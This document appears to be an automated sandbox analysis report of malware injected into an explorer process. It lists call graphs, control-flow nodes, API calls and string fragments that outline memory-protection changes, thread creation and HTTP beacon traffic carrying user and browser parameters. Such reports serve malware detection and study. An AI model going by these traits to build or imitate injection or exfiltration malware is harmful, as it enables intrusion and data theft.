                                                                                                              execution_graph 13953 dea822a 13954 dea825e 13953->13954 13955 dea78c2 ObtainUserAgentString 13954->13955 13956 dea826b 13955->13956 13929 deaeaa9 13930 deaeaaf 13929->13930 13933 dea9212 13930->13933 13932 deaeac7 13934 dea921b 13933->13934 13935 dea9237 13933->13935 13934->13935 13936 dea90c2 6 API calls 13934->13936 13935->13932 13936->13935 13854 dea972e 13855 dea976a 13854->13855 13856 dea9788 connect 13854->13856 13855->13856 13957 dea242e 13958 dea245b 13957->13958 13966 dea24c9 13957->13966 13959 deac232 NtCreateFile 13958->13959 13958->13966 13960 dea2496 13959->13960 13961 dea24c5 13960->13961 13962 dea2082 NtCreateFile 13960->13962 13963 deac232 NtCreateFile 13961->13963 13961->13966 13964 dea24b6 13962->13964 13963->13966 13964->13961 13965 dea1f52 NtCreateFile 13964->13965 13965->13961 13495 deadbac 13496 deadbb1 13495->13496 13529 deadbb6 13496->13529 13530 dea3b72 13496->13530 13498 deadc2c 13499 deadc85 13498->13499 13501 deadc69 13498->13501 13502 deadc54 13498->13502 13498->13529 13500 deabab2 NtProtectVirtualMemory 13499->13500 13503 deadc8d 13500->13503 13505 deadc6e 13501->13505 13506 deadc80 13501->13506 13504 deabab2 NtProtectVirtualMemory 13502->13504 13566 dea5102 13503->13566 13509 deadc5c 13504->13509 13510 deabab2 NtProtectVirtualMemory 13505->13510 13506->13499 13507 deadc97 13506->13507 13511 deadcbe 13507->13511 13512 deadc9c 13507->13512 13552 dea4ee2 13509->13552 13514 deadc76 13510->13514 13516 deadcd9 13511->13516 13517 deadcc7 13511->13517 13511->13529 13534 deabab2 13512->13534 13558 dea4fc2 13514->13558 13521 deabab2 NtProtectVirtualMemory 13516->13521 13516->13529 13518 deabab2 NtProtectVirtualMemory 13517->13518 13520 deadccf 13518->13520 13576 dea52f2 13520->13576 13524 deadce5 13521->13524 13594 dea5712 13524->13594 13532 dea3b93 13530->13532 13531 dea3cce 13531->13498 13532->13531 13533 dea3cb5 CreateMutexExW 13532->13533 13533->13531 13535 deabadf 13534->13535 13536 deabebc 13535->13536 13606 dea18f2 13535->13606 13544 dea4de2 13536->13544 13538 deabe5c 13539 dea18f2 NtProtectVirtualMemory 13538->13539 13540 deabe7c 13539->13540 13541 dea18f2 NtProtectVirtualMemory 13540->13541 13542 deabe9c 13541->13542 13543 dea18f2 NtProtectVirtualMemory 13542->13543 13543->13536 13545 dea4df0 13544->13545 13547 dea4ecd 13545->13547 13631 dea8382 13545->13631 13548 dea1412 13547->13548 13549 dea1440 13548->13549 13550 dea1473 13549->13550 13551 dea144d CreateThread 13549->13551 13550->13529 13551->13529 13554 dea4f06 13552->13554 13553 dea4fa4 13553->13529 13554->13553 13555 dea18f2 NtProtectVirtualMemory 13554->13555 13556 dea4f9c 13555->13556 13557 dea8382 ObtainUserAgentString 13556->13557 13557->13553 13560 dea5016 13558->13560 13559 dea50f0 13559->13529 13560->13559 13563 dea50bb 13560->13563 13564 dea18f2 NtProtectVirtualMemory 13560->13564 13561 dea50e8 13562 dea8382 ObtainUserAgentString 13561->13562 13562->13559 13563->13561 13565 dea18f2 NtProtectVirtualMemory 13563->13565 13564->13563 13565->13561 13568 dea5137 13566->13568 13567 dea52d5 13567->13529 13568->13567 13569 dea18f2 NtProtectVirtualMemory 13568->13569 13570 dea528a 13569->13570 13571 dea18f2 NtProtectVirtualMemory 13570->13571 13574 dea52a9 13571->13574 13572 dea52cd 13573 dea8382 ObtainUserAgentString 13572->13573 13573->13567 13574->13572 13575 dea18f2 NtProtectVirtualMemory 13574->13575 13575->13572 13578 dea5349 13576->13578 13577 dea549f 13579 dea18f2 NtProtectVirtualMemory 13577->13579 13583 dea54c3 13577->13583 13578->13577 13580 dea18f2 NtProtectVirtualMemory 13578->13580 13579->13583 13581 dea5480 13580->13581 13582 dea18f2 NtProtectVirtualMemory 13581->13582 13582->13577 13584 dea18f2 NtProtectVirtualMemory 13583->13584 13585 dea5597 13583->13585 13584->13585 13586 dea18f2 NtProtectVirtualMemory 13585->13586 13588 dea55bf 13585->13588 13586->13588 13587 dea56e1 13589 dea8382 ObtainUserAgentString 13587->13589 13590 dea18f2 NtProtectVirtualMemory 13588->13590 13591 dea56b9 13588->13591 13592 dea56e9 13589->13592 13590->13591 13591->13587 13593 dea18f2 NtProtectVirtualMemory 13591->13593 13592->13529 13593->13587 13595 dea5767 13594->13595 13596 dea18f2 NtProtectVirtualMemory 13595->13596 13601 dea5903 13595->13601 13597 dea58e3 13596->13597 13598 dea18f2 NtProtectVirtualMemory 13597->13598 13598->13601 13599 dea59b7 13600 dea8382 ObtainUserAgentString 13599->13600 13602 dea59bf 13600->13602 13603 dea18f2 NtProtectVirtualMemory 13601->13603 13604 dea5992 13601->13604 13602->13529 13603->13604 13604->13599 13605 dea18f2 NtProtectVirtualMemory 13604->13605 13605->13599 13607 dea1987 13606->13607 13610 dea19b2 13607->13610 13621 dea2622 13607->13621 13609 dea1c0c 13609->13538 13610->13609 13611 dea1ba2 13610->13611 13613 dea1ac5 13610->13613 13612 deade12 NtProtectVirtualMemory 13611->13612 13620 dea1b5b 13612->13620 13625 deade12 13613->13625 13615 deade12 NtProtectVirtualMemory 13615->13609 13616 dea1ae3 13616->13609 13617 dea1b3d 13616->13617 13618 deade12 NtProtectVirtualMemory 13616->13618 13619 deade12 NtProtectVirtualMemory 13617->13619 13618->13617 13619->13620 13620->13609 13620->13615 13622 dea267a 13621->13622 13623 dea267e 13622->13623 13624 deade12 NtProtectVirtualMemory 13622->13624 13623->13610 13624->13622 13626 deade45 NtProtectVirtualMemory 13625->13626 13629 deac942 13625->13629 13628 deade70 13626->13628 13628->13616 13630 deac967 13629->13630 13630->13626 13632 dea83c7 13631->13632 13635 dea8232 13632->13635 13634 dea8438 13634->13547 13636 dea825e 13635->13636 13639 dea78c2 13636->13639 13638 dea826b 13638->13634 13640 dea7934 13639->13640 13641 dea7995 ObtainUserAgentString 13640->13641 13642 dea79a6 13640->13642 13641->13642 13642->13638 13857 dea6ce2 13859 dea6dd9 13857->13859 13858 dea7022 13859->13858 13863 dea6352 13859->13863 13861 dea6f0d 13861->13858 13872 dea6792 13861->13872 13865 dea639e 13863->13865 13864 dea658e 13864->13861 13865->13864 13866 dea64ec 13865->13866 13868 dea6595 13865->13868 13867 deac232 NtCreateFile 13866->13867 13870 dea64ff 13867->13870 13868->13864 13869 deac232 NtCreateFile 13868->13869 13869->13864 13870->13864 13871 deac232 NtCreateFile 13870->13871 13871->13864 13873 dea67e0 13872->13873 13874 deac232 NtCreateFile 13873->13874 13876 dea690c 13874->13876 13875 dea6af3 13875->13861 13876->13875 13877 dea6352 NtCreateFile 13876->13877 13878 dea6602 NtCreateFile 13876->13878 13877->13876 13878->13876 13818 dea3b66 13820 dea3b6a 13818->13820 13819 dea3cce 13820->13819 13821 dea3cb5 CreateMutexExW 13820->13821 13821->13819 13879 dea92e4 13880 dea936f 13879->13880 13881 dea9305 13879->13881 13881->13880 13882 dea90c2 6 API calls 13881->13882 13882->13880 13822 deacf7a 13823 deacfb8 13822->13823 13824 dea95b2 socket 13823->13824 13825 dead081 13823->13825 13833 dead022 13823->13833 13824->13825 13826 dead134 13825->13826 13828 dead117 getaddrinfo 13825->13828 13825->13833 13827 dea9732 connect 13826->13827 13829 dead1b2 13826->13829 13826->13833 13827->13829 13828->13826 13830 dea96b2 send 13829->13830 13829->13833 13832 dead729 13830->13832 13831 dead7f4 setsockopt recv 13831->13833 13832->13831 13832->13833 13967 deab83a 13968 deab841 13967->13968 13969 deacf82 6 API calls 13968->13969 13971 deab8c5 13969->13971 13970 deab906 13971->13970 13972 deac232 NtCreateFile 13971->13972 13972->13970 13883 dea50fb 13885 dea5137 13883->13885 13884 dea52d5 13885->13884 13886 dea18f2 NtProtectVirtualMemory 13885->13886 13887 dea528a 13886->13887 13888 dea18f2 NtProtectVirtualMemory 13887->13888 13891 dea52a9 13888->13891 13889 dea52cd 13890 dea8382 ObtainUserAgentString 13889->13890 13890->13884 13891->13889 13892 dea18f2 NtProtectVirtualMemory 13891->13892 13892->13889 13937 dea90b9 13938 dea91f0 13937->13938 13939 dea90ed 13937->13939 13939->13938 13940 deacf82 6 API calls 13939->13940 13940->13938 13941 dea78be 13942 dea78c3 13941->13942 13943 dea79a6 13942->13943 13944 dea7995 ObtainUserAgentString 13942->13944 13944->13943 13793 dea4fbf 13794 dea5016 13793->13794 13796 dea50bb 13794->13796 13798 dea50f0 13794->13798 13799 dea18f2 NtProtectVirtualMemory 13794->13799 13795 dea50e8 13797 dea8382 ObtainUserAgentString 13795->13797 13796->13795 13800 dea18f2 NtProtectVirtualMemory 13796->13800 13797->13798 13799->13796 13800->13795 13750 deac232 13752 deac25c 13750->13752 13753 deac334 13750->13753 13751 deac410 NtCreateFile 13751->13753 13752->13751 13752->13753 13801 deae9b3 13802 deae9bd 13801->13802 13805 dea36d2 13802->13805 13804 deae9e0 13806 dea36f7 13805->13806 13807 dea3704 13805->13807 13809 dea10f2 6 API calls 13806->13809 13808 dea36ff 13807->13808 13810 dea372d 13807->13810 13812 dea3737 13807->13812 13808->13804 13809->13808 13814 dea92c2 13810->13814 13812->13808 13813 deacf82 6 API calls 13812->13813 13813->13808 13815 dea92cb 13814->13815 13816 dea92df 13814->13816 13815->13816 13817 dea90c2 6 API calls 13815->13817 13816->13808 13817->13816 13758 dea25f1 13759 dea260e 13758->13759 13760 dea2606 13758->13760 13762 dea7662 13760->13762 13763 dea766b 13762->13763 13771 dea77ba 13762->13771 13764 dea10f2 6 API calls 13763->13764 13763->13771 13766 dea76ee 13764->13766 13765 dea7750 13768 dea783f 13765->13768 13770 dea7791 13765->13770 13765->13771 13766->13765 13767 deacf82 6 API calls 13766->13767 13767->13765 13769 deacf82 6 API calls 13768->13769 13768->13771 13769->13771 13770->13771 13772 deacf82 6 API calls 13770->13772 13771->13759 13772->13771 13773 deae9f1 13774 deae9f7 13773->13774 13777 dea3852 13774->13777 13776 deaea0f 13778 dea38e4 13777->13778 13779 dea3865 13777->13779 13778->13776 13779->13778 13781 dea3887 13779->13781 13783 dea387e 13779->13783 13780 dea936f 13780->13776 13781->13778 13782 dea7662 6 API calls 13781->13782 13782->13778 13783->13780 13785 dea90c2 13783->13785 13786 dea91f0 13785->13786 13787 dea90cb 13785->13787 13786->13780 13787->13786 13788 deacf82 6 API calls 13787->13788 13788->13786 13893 dea10f1 13894 dea1109 13893->13894 13895 dea11d3 13893->13895 13896 dea1012 6 API calls 13894->13896 13897 dea1113 13896->13897 13897->13895 13898 deacf82 6 API calls 13897->13898 13898->13895 13899 dea52f4 13900 dea5349 13899->13900 13901 dea549f 13900->13901 13903 dea18f2 NtProtectVirtualMemory 13900->13903 13902 dea18f2 NtProtectVirtualMemory 13901->13902 13906 dea54c3 13901->13906 13902->13906 13904 dea5480 13903->13904 13905 dea18f2 NtProtectVirtualMemory 13904->13905 13905->13901 13907 dea18f2 NtProtectVirtualMemory 13906->13907 13908 dea5597 13906->13908 13907->13908 13909 dea18f2 NtProtectVirtualMemory 13908->13909 13911 dea55bf 13908->13911 13909->13911 13910 dea56e1 13912 dea8382 ObtainUserAgentString 13910->13912 13913 dea18f2 NtProtectVirtualMemory 13911->13913 13914 dea56b9 13911->13914 13915 dea56e9 13912->13915 13913->13914 13914->13910 13916 dea18f2 NtProtectVirtualMemory 13914->13916 13916->13910 13838 dea614a 13839 dea6153 13838->13839 13844 dea6174 13838->13844 13840 dea8382 ObtainUserAgentString 13839->13840 13842 dea616c 13840->13842 13841 dea61e7 13843 dea10f2 6 API calls 13842->13843 13843->13844 13844->13841 13846 dea11f2 13844->13846 13847 dea12c9 13846->13847 13848 dea120f 13846->13848 13847->13844 13849 deabf12 7 API calls 13848->13849 13851 dea1242 13848->13851 13849->13851 13850 dea1289 13850->13847 13852 dea10f2 6 API calls 13850->13852 13851->13850 13853 dea2432 NtCreateFile 13851->13853 13852->13847 13853->13850 13973 deade0a 13974 deac942 13973->13974 13975 deade45 NtProtectVirtualMemory 13974->13975 13976 deade70 13975->13976 13945 deaea4d 13946 deaea53 13945->13946 13949 dea2782 13946->13949 13948 deaea6b 13951 dea278f 13949->13951 13950 dea27ad 13950->13948 13951->13950 13952 dea7662 6 API calls 13951->13952 13952->13950 13738 deacf82 13739 deacfb8 13738->13739 13740 dea95b2 socket 13739->13740 13741 dead081 13739->13741 13749 dead022 13739->13749 13740->13741 13742 dead134 13741->13742 13744 dead117 getaddrinfo 13741->13744 13741->13749 13743 dea9732 connect 13742->13743 13745 dead1b2 13742->13745 13742->13749 13743->13745 13744->13742 13746 dea96b2 send 13745->13746 13745->13749 13748 dead729 13746->13748 13747 dead7f4 setsockopt recv 13747->13749 13748->13747 13748->13749 13789 dea4dd9 13791 dea4df0 13789->13791 13790 dea4ecd 13791->13790 13792 dea8382 ObtainUserAgentString 13791->13792 13792->13790 13977 deaea1f 13978 deaea25 13977->13978 13981 dea25f2 13978->13981 13980 deaea3d 13982 dea25fb 13981->13982 13983 dea260e 13981->13983 13982->13983 13984 dea7662 6 API calls 13982->13984 13983->13980 13984->13983 13643 dea12dd 13644 dea131a 13643->13644 13645 dea13fa 13644->13645 13646 dea1328 SleepEx 13644->13646 13650 deabf12 13644->13650 13659 dea2432 13644->13659 13669 dea10f2 13644->13669 13646->13644 13646->13646 13653 deabf48 13650->13653 13651 deac134 13651->13644 13652 deac0e9 13654 deac125 13652->13654 13687 deab842 13652->13687 13653->13651 13653->13652 13658 deac232 NtCreateFile 13653->13658 13675 deacf82 13653->13675 13695 deab922 13654->13695 13658->13653 13660 dea245b 13659->13660 13668 dea24c9 13659->13668 13661 deac232 NtCreateFile 13660->13661 13660->13668 13662 dea2496 13661->13662 13667 dea24c5 13662->13667 13716 dea2082 13662->13716 13664 deac232 NtCreateFile 13664->13668 13665 dea24b6 13665->13667 13725 dea1f52 13665->13725 13667->13664 13667->13668 13668->13644 13670 dea1109 13669->13670 13671 dea11d3 13669->13671 13730 dea1012 13670->13730 13671->13644 13673 dea1113 13673->13671 13674 deacf82 6 API calls 13673->13674 13674->13671 13676 deacfb8 13675->13676 13678 dead081 13676->13678 13686 dead022 13676->13686 13703 dea95b2 13676->13703 13679 dead134 13678->13679 13681 dead117 getaddrinfo 13678->13681 13678->13686 13682 dead1b2 13679->13682 13679->13686 13706 dea9732 13679->13706 13681->13679 13682->13686 13709 dea96b2 13682->13709 13684 dead7f4 setsockopt recv 13684->13686 13685 dead729 13685->13684 13685->13686 13686->13653 13688 deab86d 13687->13688 13712 deac232 13688->13712 13690 deab906 13690->13652 13691 deab888 13691->13690 13692 deacf82 6 API calls 13691->13692 13693 deab8c5 13691->13693 13692->13693 13693->13690 13694 deac232 NtCreateFile 13693->13694 13694->13690 13696 deab9c2 13695->13696 13697 deac232 NtCreateFile 13696->13697 13701 deab9d6 13697->13701 13698 deaba9f 13698->13651 13699 deaba5d 13699->13698 13700 deac232 NtCreateFile 13699->13700 13700->13698 13701->13698 13701->13699 13702 deacf82 6 API calls 13701->13702 13702->13699 13704 dea960a socket 13703->13704 13705 dea95ec 13703->13705 13704->13678 13705->13704 13707 dea976a 13706->13707 13708 dea9788 connect 13706->13708 13707->13708 13708->13682 13710 dea96e7 13709->13710 13711 dea9705 send 13709->13711 13710->13711 13711->13685 13714 deac25c 13712->13714 13715 deac334 13712->13715 13713 deac410 NtCreateFile 13713->13715 13714->13713 13714->13715 13715->13691 13717 dea2420 13716->13717 13718 dea20aa 13716->13718 13717->13665 13718->13717 13719 deac232 NtCreateFile 13718->13719 13721 dea21f9 13719->13721 13720 dea23df 13720->13665 13721->13720 13722 deac232 NtCreateFile 13721->13722 13723 dea23c9 13722->13723 13724 deac232 NtCreateFile 13723->13724 13724->13720 13726 dea1f70 13725->13726 13727 dea1f84 13725->13727 13726->13667 13728 deac232 NtCreateFile 13727->13728 13729 dea2046 13728->13729 13729->13667 13732 dea1031 13730->13732 13731 dea10cd 13731->13673 13732->13731 13733 deacf82 6 API calls 13732->13733 13733->13731 13917 dea4edd 13919 dea4f06 13917->13919 13918 dea4fa4 13919->13918 13920 dea18f2 NtProtectVirtualMemory 13919->13920 13921 dea4f9c 13920->13921 13922 dea8382 ObtainUserAgentString 13921->13922 13922->13918 13754 deade12 13755 deade45 NtProtectVirtualMemory 13754->13755 13756 deac942 13754->13756 13757 deade70 13755->13757 13756->13755 13985 dea2613 13987 dea2620 13985->13987 13986 dea267e 13987->13986 13988 deade12 NtProtectVirtualMemory 13987->13988 13988->13987 13923 dea6cd4 13925 dea6cd8 13923->13925 13924 dea7022 13925->13924 13926 dea6352 NtCreateFile 13925->13926 13927 dea6f0d 13926->13927 13927->13924 13928 dea6792 NtCreateFile 13927->13928 13928->13927

                                                                                                              Executed Functions

                                                                                                              Function 0DEACF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 deacf82-deacfb6 1 deacfb8-deacfbc 0->1 2 deacfd6-deacfd9 0->2 1->2 3 deacfbe-deacfc2 1->3 4 dead8fe-dead90c 2->4 5 deacfdf-deacfed 2->5 3->2 6 deacfc4-deacfc8 3->6 7 deacff3-deacff7 5->7 8 dead8f6-dead8f7 5->8 6->2 9 deacfca-deacfce 6->9 10 deacff9-deacffd 7->10 11 deacfff-dead000 7->11 8->4 9->2 13 deacfd0-deacfd4 9->13 10->11 12 dead00a-dead010 10->12 11->12 14 dead03a-dead060 12->14 15 dead012-dead020 12->15 13->2 13->5 17 dead068-dead07c call dea95b2 14->17 18 dead062-dead066 14->18 15->14 16 dead022-dead026 15->16 16->8 19 dead02c-dead035 16->19 22 dead081-dead0a2 17->22 18->17 20 dead0a8-dead0ab 18->20 19->8 23 dead0b1-dead0b8 20->23 24 dead144-dead150 20->24 22->20 25 dead8ee-dead8ef 22->25 27 dead0ba-dead0dc call deac942 23->27 28 dead0e2-dead0f5 23->28 24->25 26 dead156-dead165 24->26 25->8 30 dead17f-dead18f 26->30 31 dead167-dead178 call dea9552 26->31 27->28 28->25 29 dead0fb-dead101 28->29 29->25 33 dead107-dead109 29->33 35 dead191-dead1ad call dea9732 30->35 36 dead1e5-dead21b 30->36 31->30 33->25 40 dead10f-dead111 33->40 47 dead1b2-dead1da 35->47 38 dead22d-dead231 36->38 39 dead21d-dead22b 36->39 44 dead233-dead245 38->44 45 dead247-dead24b 38->45 43 dead27f-dead280 39->43 40->25 46 dead117-dead132 getaddrinfo 40->46 51 dead283-dead2e0 call deadd62 call deaa482 call dea9e72 call deae002 43->51 44->43 48 dead24d-dead25f 45->48 49 dead261-dead265 45->49 46->24 50 dead134-dead13c 46->50 47->36 52 dead1dc-dead1e1 47->52 48->43 53 dead26d-dead279 49->53 54 dead267-dead26b 49->54 50->24 63 dead2e2-dead2e6 51->63 64 dead2f4-dead354 call deadd92 51->64 52->36 53->43 54->51 54->53 63->64 65 dead2e8-dead2ef call deaa042 63->65 69 dead35a-dead396 call deadd62 call deae262 call deae002 64->69 70 dead48c-dead4b8 call deadd62 call deae262 64->70 65->64 86 dead3bb-dead3e9 call deae262 * 2 69->86 87 dead398-dead3b7 call deae262 call deae002 69->87 79 dead4ba-dead4d5 70->79 80 dead4d9-dead590 call deae262 * 3 call deae002 * 2 call deaa482 70->80 79->80 108 dead595-dead5b9 call deae262 80->108 101 dead3eb-dead410 call deae002 call deae262 86->101 102 dead415-dead41d 86->102 87->86 101->102 105 dead41f-dead425 102->105 106 dead442-dead448 102->106 111 dead467-dead487 call deae262 105->111 112 dead427-dead43d 105->112 107 dead44e-dead456 106->107 106->108 107->108 113 dead45c-dead45d 107->113 121 dead5bb-dead5cc call deae262 call deae002 108->121 122 dead5d1-dead6ad call deae262 * 7 call deae002 call deadd62 call deae002 call dea9e72 call deaa042 108->122 111->108 112->108 113->111 132 dead6af-dead6b3 121->132 122->132 135 dead6ff-dead72d call dea96b2 132->135 136 dead6b5-dead6fa call dea9382 call dea97b2 132->136 144 dead72f-dead735 135->144 145 dead75d-dead761 135->145 152 dead8e6-dead8e7 136->152 144->145 148 dead737-dead74c 144->148 149 dead90d-dead913 145->149 150 dead767-dead76b 145->150 148->145 153 dead74e-dead754 148->153 154 dead779-dead784 149->154 155 dead919-dead920 149->155 156 dead8aa-dead8df call dea97b2 150->156 157 dead771-dead773 150->157 152->25 153->145 161 dead756 153->161 162 dead786-dead793 154->162 163 dead795-dead796 154->163 155->162 156->152 157->154 157->156 161->145 162->163 164 dead79c-dead7a0 162->164 163->164 167 dead7a2-dead7af 164->167 168 dead7b1-dead7b2 164->168 167->168 170 dead7b8-dead7c4 167->170 168->170 173 dead7c6-dead7ef call deadd92 call deadd62 170->173 174 dead7f4-dead861 setsockopt recv 170->174 173->174 177 dead8a3-dead8a4 174->177 178 dead863 174->178 177->156 178->177 181 dead865-dead86a 178->181 181->177 184 dead86c-dead872 181->184 184->177 186 dead874-dead8a1 184->186 186->177 186->178
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: getaddrinforecvsetsockopt
                                                                                                              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                              • API String ID: 1564272048-1117930895
                                                                                                              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                              • Instruction ID: 2a7761294be53452ae7f6383ec0ff37bd5350cc5da45962b19f83b570e8047e4
                                                                                                              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                              • Instruction Fuzzy Hash: B7529C30218A098BCB29EF6CC8847E9B7E1FB54304F51562ED49BDB142EE30F54ACB91
                                                                                                              Function 0DEAC232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 303 deac232-deac256 304 deac25c-deac260 303->304 305 deac8bd-deac8cd 303->305 304->305 306 deac266-deac2a0 304->306 307 deac2bf 306->307 308 deac2a2-deac2a6 306->308 310 deac2c6 307->310 308->307 309 deac2a8-deac2ac 308->309 311 deac2ae-deac2b2 309->311 312 deac2b4-deac2b8 309->312 313 deac2cb-deac2cf 310->313 311->310 312->313 314 deac2ba-deac2bd 312->314 315 deac2f9-deac30b 313->315 316 deac2d1-deac2f7 call deac942 313->316 314->313 320 deac378 315->320 321 deac30d-deac332 315->321 316->315 316->320 324 deac37a-deac3a0 320->324 322 deac3a1-deac3a8 321->322 323 deac334-deac33b 321->323 327 deac3aa-deac3d3 call deac942 322->327 328 deac3d5-deac3dc 322->328 325 deac33d-deac360 call deac942 323->325 326 deac366-deac370 323->326 325->326 326->320 332 deac372-deac373 326->332 327->320 327->328 329 deac3de-deac40a call deac942 328->329 330 deac410-deac458 NtCreateFile call deac172 328->330 329->320 329->330 339 deac45d-deac45f 330->339 332->320 339->320 340 deac465-deac46d 339->340 340->320 341 deac473-deac476 340->341 342 deac478-deac481 341->342 343 deac486-deac48d 341->343 342->324 344 deac48f-deac4b8 call deac942 343->344 345 deac4c2-deac4ec 343->345 344->320 350 deac4be-deac4bf 344->350 351 deac8ae-deac8b8 345->351 352 deac4f2-deac4f5 345->352 350->345 351->320 353 deac4fb-deac4fe 352->353 354 deac604-deac611 352->354 355 deac55e-deac561 353->355 356 deac500-deac507 353->356 354->324 361 deac616-deac619 355->361 362 deac567-deac572 355->362 358 deac538-deac559 356->358 359 deac509-deac532 call deac942 356->359 366 deac5e9-deac5fa 358->366 359->320 359->358 364 deac6b8-deac6bb 361->364 365 deac61f-deac626 361->365 367 deac5a3-deac5a6 362->367 368 deac574-deac59d call deac942 362->368 370 deac739-deac73c 364->370 371 deac6bd-deac6c4 364->371 373 deac628-deac651 call deac942 365->373 374 deac657-deac66b call deade92 365->374 366->354 367->320 369 deac5ac-deac5b6 367->369 368->320 368->367 369->320 376 deac5bc-deac5e6 369->376 380 deac742-deac749 370->380 381 deac7c4-deac7c7 370->381 377 deac6c6-deac6ef call deac942 371->377 378 deac6f5-deac734 371->378 373->320 373->374 374->320 391 deac671-deac6b3 374->391 376->366 377->351 377->378 401 deac894-deac8a9 378->401 387 deac77a-deac7bf 380->387 388 deac74b-deac774 call deac942 380->388 381->320 384 deac7cd-deac7d4 381->384 392 deac7fc-deac803 384->392 393 deac7d6-deac7f6 call deac942 384->393 387->401 388->351 388->387 391->324 399 deac82b-deac835 392->399 400 deac805-deac825 call deac942 392->400 393->392 399->351 405 deac837-deac83e 399->405 400->399 401->324 405->351 406 deac840-deac886 405->406 406->401
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID: `
                                                                                                              • API String ID: 823142352-2679148245
                                                                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                              • Instruction ID: 95d7070af55706bd8270113daf1c95777b711a92a47f4af34a0521f686882214
                                                                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                              • Instruction Fuzzy Hash: 8D223B74A18A0A9FCB59DF2CC4946AAB7E1FB98305F50522EE45EEB250DF30E451CB81
                                                                                                              Function 0DEADE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 447 deade12-deade38 448 deade45-deade6e NtProtectVirtualMemory 447->448 449 deade40 call deac942 447->449 450 deade7d-deade8f 448->450 451 deade70-deade7c 448->451 449->448
                                                                                                              APIs
                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 0DEADE67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2706961497-0
                                                                                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                              • Instruction ID: a046e715693f89fb09aa5af3aa0ad9c55d9fa2fa5106b40d2cc62e0b9efc7144
                                                                                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                              • Instruction Fuzzy Hash: 7D01B134628B884F8B88EF6CD48012AB7E4FBDD314F000B3EE99AC7254EB74D5414742
                                                                                                              Function 0DEADE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 452 deade0a-deade6e call deac942 NtProtectVirtualMemory 455 deade7d-deade8f 452->455 456 deade70-deade7c 452->456
                                                                                                              APIs
                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 0DEADE67
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2706961497-0
                                                                                                              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                              • Instruction ID: 75012664ede0b56c85c9988c202593571020b229bcdfb44534c55e70c808bd19
                                                                                                              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                              • Instruction Fuzzy Hash: 1701A734628B884B8748EB2C94411A6B3E5FBCE314F000B3EE59AC3240DB25D5014782
                                                                                                              Function 0DEA78C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • ObtainUserAgentString.URLMON ref: 0DEA79A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AgentObtainStringUser
                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                              • API String ID: 2681117516-319646191
